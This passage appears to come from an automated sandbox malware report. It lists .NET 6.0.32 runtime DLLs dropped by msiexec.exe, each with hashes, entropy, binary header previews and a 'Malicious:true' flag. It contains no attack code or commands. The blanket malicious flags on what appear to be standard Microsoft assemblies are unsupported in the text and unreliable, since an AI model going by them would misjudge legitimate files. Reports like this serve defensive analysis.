                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.696655038011177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:duJ92HRT5BgWEIvWqYA6VFHRN7jD/6fR9z+AGs:duSPVFClw9zhGs
                                                                                                                                                                                                                                        MD5:31939565A9F07F3F49C54FAD45801A00
                                                                                                                                                                                                                                        SHA1:65BA7980289BD49EF02850CE99D8B3925DEB6CED
                                                                                                                                                                                                                                        SHA-256:6DE1F9CD04748D01103B2CBBEAF8E9FB671F9ACA79E8A1D68D741BA3FD504B72
                                                                                                                                                                                                                                        SHA-512:0874344B998AF7178A84AF77B9E855C9202957F6519204F7EA45D3DEAE080D46166695D8AB6ABE216C9E92EEB92FDC52A75D985ABB9921CEAA505DFDF072DF29
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8.U..........."!..0..............*... ........@.. ....................................`..................................)..O....@...................(...`.......)..8............................................ ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ..D...................P .............................................0`<...Z%b*.D.\..\[$F...>..HX.h.DY.6.[.......f........./..C......O..S..#.&P....N....}..A..{E..'.....S.;6..|tY...yK.)BSJB............v4.0.30319......`.......#~..d... ...#Strings............#GUID...........#Blob......................3......................................P.........7...........P...........{.............................6...........p.......................W.....d...................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Timer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15640
                                                                                                                                                                                                                                        Entropy (8bit):6.822464705364611
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:pf6juqM5MWMWsXCW/dX6HRN76y/7R9zb3J:MuaRW/F9z9
                                                                                                                                                                                                                                        MD5:E507D8F4299A16AEBDF20F8C226D7721
                                                                                                                                                                                                                                        SHA1:8D97F1AE505F72B59C939C55D4C0EFACD46D4525
                                                                                                                                                                                                                                        SHA-256:F3651DE4AEC67E4C937CB219AFD0C07B2338B8D8FAF3D3636B8C678C3E3DDC33
                                                                                                                                                                                                                                        SHA-512:84E9265E59B58BEC360FDBD9A17D1DD8BA2245FEA11DC66F352BB5ECECA3409AE5568B8A620FCB39F5F4E2FF046C7E11EAA492ADF386336EFA655BF3BC799383
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k............."!..0..............)... ........@.. ....................................`.................................T)..W....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P .......................................@j.Q...FR.n...Y.......ja..Z$.P.......p..w.....(..*....#...?...xr....n.].(..Mm..iy..ws..h...t.7.\..u..u..k...C..I..+.<`<(.FBSJB............v4.0.30319......`.......#~..<.......#Strings............#GUID...(.......#Blob......................3......................................(........."...........;.y.........f.......C.................J...!.J.....J...[.J.....J.....J.....J...B.J...O.J...v.............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):80160
                                                                                                                                                                                                                                        Entropy (8bit):6.552617630589504
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:xk5Rj1Ku+ydo98uGxdUJpRH7AveQWA3zg:xk5Rj3o9wxdUrKveQL3c
                                                                                                                                                                                                                                        MD5:B754A2BFD575ABDBA9F77D1D6BF6980E
                                                                                                                                                                                                                                        SHA1:1D21B27B5112887AB72DDE91691C69D87C8F3282
                                                                                                                                                                                                                                        SHA-256:6DAAD511BB06971C76A7007D31DB88013876A9BC07B899C78536770C1D901983
                                                                                                                                                                                                                                        SHA-512:85B9A08D7CA1279CA2EC579FBE48E9E5E4BB547D865BAEFCB37925D31453160E681E2A4B46231F6B315CBA0AA5892BAE4FC98CF882A708D1A8E4FB61A721F0CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .........................................................0.......l....`...@......@............... ..................................d....*..\....... )... ..$.......T...........................................................h...H............text...K........................... ..`.data...............................@....reloc..$.... ......................@..B............................................0.......................T.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........l.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...H.....0.0.0.0.0.4.b.0...:.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...T.h.r.e.a.d.i.n.g.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...J.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...T.h.r.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.Local.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):351408
                                                                                                                                                                                                                                        Entropy (8bit):6.645438345682704
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:RtgASVaxfSelpxZvc/sQQHrnAIg5UotQKm9Wm:Ru1MfSel9cSbeusu
                                                                                                                                                                                                                                        MD5:6EB30716DB16FCAE13DE2878B364834F
                                                                                                                                                                                                                                        SHA1:FC5F0E68985BAD853CCCD4161240301F89BF1EBE
                                                                                                                                                                                                                                        SHA-256:1154CFA28DDD245FDF6A66CE66F9F2AEC217FA5CBE85FE43D24203BFCC8E9D56
                                                                                                                                                                                                                                        SHA-512:7829A405590415366DBFA82AE688728E0D42A844DACC0BC2BE6050223743FF896B92A43C1756BD2960F31B52154E2DD0A460C9059AA09B3EC82B223D642DCFB6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....a............" .........X...............................................P............`...@......@............... .......................................z...3...4...(...@.......*..T...............................................................H............text...N........................... ..`.data....O.......P..................@....reloc.......@.......,..............@..B............................................0...........................L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...L.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...T.r.a.n.s.a.c.t.i.o.n.s...L.o.c.a.l...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...\.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17160
                                                                                                                                                                                                                                        Entropy (8bit):6.671296739666298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:p5uFRferVWzniWQMYA6VFHRN7TbV2R9zEx0H:3uFRam0MFClnVK9zou
                                                                                                                                                                                                                                        MD5:D07CB5BEB58C160D2C91CD7BD180279A
                                                                                                                                                                                                                                        SHA1:4B8ED2324043AB385754645768735CC18381B484
                                                                                                                                                                                                                                        SHA-256:B1758317695CA37A11A6B28D6580BEAA3E24B84C31BFFE08268B1B9D1A3EF66E
                                                                                                                                                                                                                                        SHA-512:DFD5DE8F66D4B743E7633A4C7FDBDAA6A9AFA0D886B17540D0DC7991294554E1E37E6BF690BCEDABA6E2DE51620F01B87BF08AA5F4A42AB99DED342BCD46F473
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....x..........." ..0.............j/... ...@....... ...............................W....`................................../..O....@..x................)...`......8...T............................................ ............... ..H............text...p.... ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B................K/......H.......P ..h....................-......................................BSJB............v4.0.30319......l.......#~..d...4...#Strings............#US.........#GUID...........#Blob............T.........3....................................$...............f.O.....O...^.<...o.................H.....*.................+.......................r.....,...........D.$.....O.................6.....6.....6...).6...1.6...9.6...A.6...I.6...Q.6...Y.6...a.6...i.6...q.6...y.6.....6. ...6.....6...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15640
                                                                                                                                                                                                                                        Entropy (8bit):6.8271170909193595
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ztCdcH/3WtLGW/0X6HRN73SVXC4deR9zVjoxE:zt1WcW3SVXC4dC9zVjGE
                                                                                                                                                                                                                                        MD5:F741922F1BE081E21EDA4B2914767B53
                                                                                                                                                                                                                                        SHA1:F9ED958AF5E6C03AF36B96B186CD7E401C4052AC
                                                                                                                                                                                                                                        SHA-256:8DA6AB511A6534D713978692672EC276F314A47CB5DDC14C86504AE60C2FEA47
                                                                                                                                                                                                                                        SHA-512:7F0FF4397FDA2F9431B7B6D9293CA67337F0A14BB6413657E5930444564CA9AD782BA9BCD8D58051DA9463C15FA976DDF6C468EE2AECF16461FE494C01EA20C8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............)... ........@.. ..............................e.....`..................................)..K....@..h................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc...h....@......................@..@.reloc.......`......................@..B.................)......H........ ..,...................P ...........................................:....z.5......c.1..xy..x...?.I.c...$.:~o....Q..h..c......b.E...Yi...P;...*............~.....gI'...]..w.y...M..x..j.C.{BSJB............v4.0.30319......`...@...#~..........#Strings............#GUID...........#Blob......................3......................................]...............%...................C.....s...Q.z.....z.....z.....z...4.z.....z.....z.....z.....z...........i.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.HttpUtility.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):53008
                                                                                                                                                                                                                                        Entropy (8bit):6.688774065052827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:AwDvSbAkyFFQk7Y32OoPXCcPAhiTEp4zg:ASvSb0Fg2OdNhwXs
                                                                                                                                                                                                                                        MD5:F5962FB172B47E10C89F6C1B8D4783F9
                                                                                                                                                                                                                                        SHA1:62619E522B88328038800E6A38A0084E8F17E934
                                                                                                                                                                                                                                        SHA-256:917175687C1BD5869B905A142D63D22BAF42A8BA362096864DE7A66F69047EC1
                                                                                                                                                                                                                                        SHA-512:0771E5854C791BC839973E892A1CA90E1FFD3A3FD86D9D7C64FFDAA2A5D0B23EE4D1CB6C56DACADCBFD8F1D3416F4061226F9EAF861E4C020200E38730A082C2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ......................................................................`...@......@............... ......................................\!...........)..........8...T...............................................................H............text.............................. ..`.data...&...........................@....reloc..............................@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...F.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...W.e.b...H.t.t.p.U.t.i.l.i.t.y.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...V.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                                        Entropy (8bit):6.716371448586581
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3EBNDT7WV9o9W4YA6VFHRN7KS9/7R9zb3p:3uxdFCl1F9zF
                                                                                                                                                                                                                                        MD5:3963AEC41EFA623195DC1B54BCADE00F
                                                                                                                                                                                                                                        SHA1:248D5777CB7DADB14613AA943120FE5DCC83315E
                                                                                                                                                                                                                                        SHA-256:5AA37A176F95A69D752260EF02DFDA1032BC2874232C4F6136CDD63B97A122D6
                                                                                                                                                                                                                                        SHA-512:07F393245A075E135C33EB7DE8E4432EA8AB3128CC6584019389EFE484C0BE921E6162F86ACA7A634C1482ED1E23EAA92686CA4543D1B2F9BC17AE32A3290370
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,............." ..0.............z*... ...@....... ....................................`.................................%*..O....@..8................)...`......X)..T............................................ ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`......................@..B................Y*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....0.......#US.4.......#GUID...D...D...#Blob............T.........3....................................................6.Y.....Y...X.F...y.......................$...........o.......................V.....l.................>.......Y.................@.....@.....@...).@...1.@...9.@...A.@...I.@...Q.@...Y.@...a.@...i.@...q.@...y.@.....@. ...@.....@...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Windows.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16664
                                                                                                                                                                                                                                        Entropy (8bit):6.684122110106261
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:dyaMtw0IWEXSWKkX6HRN7YDcTR9zi2elD:nldrWYAV9zpeB
                                                                                                                                                                                                                                        MD5:82991C800672C8C8F6EBE3E91C497480
                                                                                                                                                                                                                                        SHA1:43FB34B32C01418A5B58C093CBB87C6775601B2C
                                                                                                                                                                                                                                        SHA-256:5E7316F534DD1E38D31F780C962DD66A208C985766C4B9368EB8CABE550B04DA
                                                                                                                                                                                                                                        SHA-512:407E343770005B1D15FE2DA8EB6EA04D4537FE817A71B4010FC638620DA236FD0C56A1D097774D5CB74FB141888C3793FCADD438E64CB49D27308F491B94BDE3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...aT............" ..0..............,... ...@....... ....................................`..................................+..O....@..X................)...`.......+..T............................................ ............... ..H............text...4.... ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................,......H.......P ..4....................*......................................BSJB............v4.0.30319......l...h...#~..........#Strings............#US.........#GUID.......@...#Blob............T.........3......................................................Q...&.Q.....>...q.......D.........m.....y.................P...................................4.............Q..... ...........8.....8.....8...).8...1.8...9.8...A.8...I.8...Q.8...Y.8...a.8...i.8...q.8...y.8.....8. ...8.....8...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Linq.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16648
                                                                                                                                                                                                                                        Entropy (8bit):6.676823175680729
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:KhMvGUhsO/IOW1l4WOpWjA6Kr4PFHnhWgN7acW6ZusyttuX01k9z3A1ipuI:jRsYIOW1l4WOYA6VFHRN77gSR9zWipN
                                                                                                                                                                                                                                        MD5:9B199D5A54F72278382972497F097E1C
                                                                                                                                                                                                                                        SHA1:2FC93773CE859318FEA293E1553616E5545D1973
                                                                                                                                                                                                                                        SHA-256:ADA298EE6BAE973FD1CC6E010B0DF89A137E144EDB6BF2B2EB8F5C9F516B0767
                                                                                                                                                                                                                                        SHA-512:30E4917B014728E28B5C21A91BD1F0DA27D09083576E6E4091B19E61CA7E7F199EB568B82DD94F5A2AF9EF02211231395D3C39B4874E4B81F217972995350845
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............,... ...@....... ...............................+....`..................................,..O....@..X................)...`.......+..T............................................ ............... ..H............text........ ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................,......H.......P ......................(+......................................BSJB............v4.0.30319......l...l...#~......<...#Strings............#US.........#GUID...(.......#Blob............T.........3..........................................f...........+.....+.........K.......;.....z...d.....p.................G...................................+.......).....+.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22296
                                                                                                                                                                                                                                        Entropy (8bit):6.362401884446514
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:u125qkxK67ex4FCcuRW1dAWepX6HRN7FR9zRYeb7V:UKLPfIWX9zf
                                                                                                                                                                                                                                        MD5:A3A7DF1630D2F94A404911C42EC86548
                                                                                                                                                                                                                                        SHA1:A36036B911CE2E458E0CF3D7F88DC21C6C745252
                                                                                                                                                                                                                                        SHA-256:7CC3FB7B986824999BFA8495606B73FDB2BF4FA550B2B2969087D7A3A438129A
                                                                                                                                                                                                                                        SHA-512:0465AEE62552F9BA8F4B10236479749929923B052889A91802FEBE2001E5B27A1579791F584172EA651615CB597B50B78049859029960153BB78F147ECC35E8B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U............."!..0..$...........B... ........@.. ..............................2.....`.................................LB..O....`...................)...........A..8............................................ ............... ..H............text...."... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................B......H........ ... ..................P ......................................$..U...,-....d.l..a.../'.....&.~..ci..@O88.2.S&....u\1.a...N..t......../+B.<O.M..*T7...8.4....t..T...U.....a`.......BSJB............v4.0.30319......`.......#~......8...#Strings............#GUID...(.......#Blob......................3............................................................G..... .......b.....i...f.....-.........................................[...............................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Serialization.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16664
                                                                                                                                                                                                                                        Entropy (8bit):6.740295761391647
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:s77MLW7MWEqHWdeX6HRN7V5HtcTR9zi2eN4:sfMkpEq3WVFWV9zpem
                                                                                                                                                                                                                                        MD5:F816E514999F8058A7314CB848A829C2
                                                                                                                                                                                                                                        SHA1:9E2B4CC7AEAB7DEA40FE839A1F60BE83092A62E2
                                                                                                                                                                                                                                        SHA-256:B3D731DBDD4690E8EE2C2DDF3863DF96EFC075048A2014CF27FCB15826E9A354
                                                                                                                                                                                                                                        SHA-512:4B1C5D989D04CC8B790A98A3B658B657E331F7196EB67DF1E83E6915792677971CA222CB51F692DFF79D712378E49ABDFB77E716C37BAEB5985F73656AE58287
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0..............-... ...@....... ..............................kY....`..................................-..O....@...................)...`.......,..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l...x...#~..........#Strings............#US.........#GUID...........#Blob............T.........3..........................................p.........$.F.....F...r.....|.......<...............*...........]...........0.....M.....D.................s.....D.....x.F.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16152
                                                                                                                                                                                                                                        Entropy (8bit):6.763138114329992
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:3rxp3W/edW4WpWxNzx95jmHnhWgN7acW7lwKUWX01k9z3A/bsi:1p3W/edWFSX6HRN7b2R9zEN
                                                                                                                                                                                                                                        MD5:4A97F6106712E9C5EEF01AE7B67266E6
                                                                                                                                                                                                                                        SHA1:2F22F7990DD4071D32DDAEA2540F82226DCDE930
                                                                                                                                                                                                                                        SHA-256:D125080F4D56BBFB3D41F40AC47A5D24C7C62EF52442D1219A0076DEB4C9AB72
                                                                                                                                                                                                                                        SHA-512:95D7E51BD942B999BA03A0132B1CFC89DF677646A0DFE18D4A64A81DC4336170A47B7CEA5FAD6133530CCA7C13D54293D35C37D2A7DD93F957AF52BC570A20D9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1l..........."!..0..............+... ........@.. ...............................7....`.................................L+..O....@...................)...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ......................................uL....M..*2.....L..L.1./.......6.u.?......L..DK.^...jp.K..:..i.K._.re.Iq.`b.7....C]..y.j`U..Of.!..f....|)..n..$..\....o.3vJBSJB............v4.0.30319......`.......#~..l.......#Strings............#GUID...,.......#Blob......................3................................................L...............................8.....L...p.L.....L.....L.....L.....L.....L...l.L.....L.............................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18080
                                                                                                                                                                                                                                        Entropy (8bit):6.63523384035834
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:tW0TeWp4DT8VGTYA6VFHRN7dJ/R9zphxF:Rp4DAqFClHZ9zj7
                                                                                                                                                                                                                                        MD5:1A0C9FD9FF7364B200A5A3A4F7697575
                                                                                                                                                                                                                                        SHA1:642B759B7F295B75C383C32E9A14E6662CEBF8D3
                                                                                                                                                                                                                                        SHA-256:13BC6FAF450D3EFAD855E2C18BD0A042C2F19F71BD4A6624F932D644819D336F
                                                                                                                                                                                                                                        SHA-512:F59563D3779A01F6199657F813CE9C598368AF918DBBF3CB91A0AC5CC1887D8A2E36BFD67A2CE10568D7DB942CF1F60DBC1B9048AB05A7BE4DCEB5BC4361E625
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...?P|..........." .........................................................P......n.....`...@......@............... ......................................0...H........(...@......P...T...............................................................H............text............................... ..`.data...?....0......................@....reloc.......@......................@..B............................................0...........................\.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...N.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...X.m.l...X.P.a.t.h...X.D.o.c.u.m.e.n.t.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...^.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.708050473788568
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:2/lRiA6fDOxDWB4vWifYA6VFHRN7JKDX+iR9zZOdih:OPKkTFClJKDuO9zS+
                                                                                                                                                                                                                                        MD5:3EA28D1CFA9BC0837699982788065BB8
                                                                                                                                                                                                                                        SHA1:6567890ED00E87AAC9FC908B08FD47C9DF5C3382
                                                                                                                                                                                                                                        SHA-256:6C6099617CBFA7F072F1DFA910002C19FC53F6F6F25C3440368B55184B4FB00B
                                                                                                                                                                                                                                        SHA-512:51583767F241F621CA480986C044358059AD1419FD78F142BD4DBE32F9C154FAC736BA4E05ECC94C3817D5DC77D21AF0B5B9308952F0DA9E343939965260221B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
